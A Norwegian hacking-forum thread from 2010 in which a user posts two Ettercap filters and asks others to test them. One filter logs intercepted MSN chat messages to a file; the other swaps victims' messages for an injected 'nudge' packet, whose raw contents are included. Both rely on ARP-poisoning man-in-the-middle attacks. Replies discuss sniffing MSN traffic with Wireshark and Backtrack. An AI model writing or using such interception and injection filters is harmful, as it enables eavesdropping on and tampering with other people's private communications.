Du må være registrert og logget inn for å kunne legge ut innlegg på freak.no
X
LOGG INN
... eller du kan registrere deg nå
Dette nettstedet er avhengig av annonseinntekter for å holde driften og videre utvikling igang. Vi liker ikke reklame heller, men alternativene er ikke mange. Vær snill å vurder å slå av annonseblokkering, eller å abonnere på en reklamefri utgave av nettstedet.
  7 1429
Hei jeg har laget to filter til ettercap, men har problemer med å få arp til å virke i nettverket mitt siden hver gang jeg prøver på arp blir jeg disconnectet.
Her er kildekodene, kan noen teste de eller lese korektur?

Et filter for å logge meldinger i MSN:

Kode

if (search(DATA.data, "MSG"))
{
if (search(DATA.data, "CS=1; PF="))
{
msg("MSN logged in /MSNPacket/msnlog.log");
log(DATA.data, "/MSNPacket/msnlog.log");
}
}
Et filter for å endre alle msn meldinger til nudger:

Kode

if (search(DATA.data, "MSG"))
{
if (search(DATA.data, "CS=1; PF="))
{
replace(DATA.data, "");
inject("/MSNFilter/nudge.pk");
}
}

Pakken til en nudge i MSN
Filplassering: /MSNFilter/nudge.pk

Kode

""9wE{I@,A659G jo 3PAvMSG 603 N 69
MIME-Version: 1.0
Content-Type: text/x-msnmsgr-datacast

ID: 1
Jeg er ikke noe god på ettercap, men har sniffet litt msn med wireshark. Det er også veldig enkelt. Bruker Backtrack 4, der er det nok en del tools du kan bruke for å fikse problemet.

Her kan du lese mer:
Sniffers
Sist endret av polarbear; 4. mars 2010 kl. 19:39.
Trådstarter
Jeg vet hvordan jeg bruker Wireshark, men det er mye lettere å bare bruke Ettercap filter, du kan endre nesten all data de mottar på en enkel måte. Jeg laget disse filterene for morroskyld, det er ikke noe vanskelig å lese msn meldinger i Wireshark, men det tar lenger tid

Jeg anbefaler deg å se denne filmen:
http://infinityexists.com/videos/episode20/

Edit: Hvordan filtrerer jeg ut slik at det bare er for eksempel TCP eller ARP pakker jeg ser i Wireshark?
Sist endret av ynkey; 5. mars 2010 kl. 00:45.
Ved å skrive inn tcp eller arp i filteret. Om du vil ha begge kan du skrive tcp || arp.
▼ ... over en uke senere ... ▼
vil man bare få chatt meldingene, eller får man cam, lyd, bilder og hele sullamitten?
Trådstarter
Jeg har ikke fått prøvd det, men hvis det virker skal man bare få chat meldingene.
Funker nudge tingen?
Trådstarter
Som sagt, jeg vet ikke. Jeg postet de hær for at noen skulle teste de ut...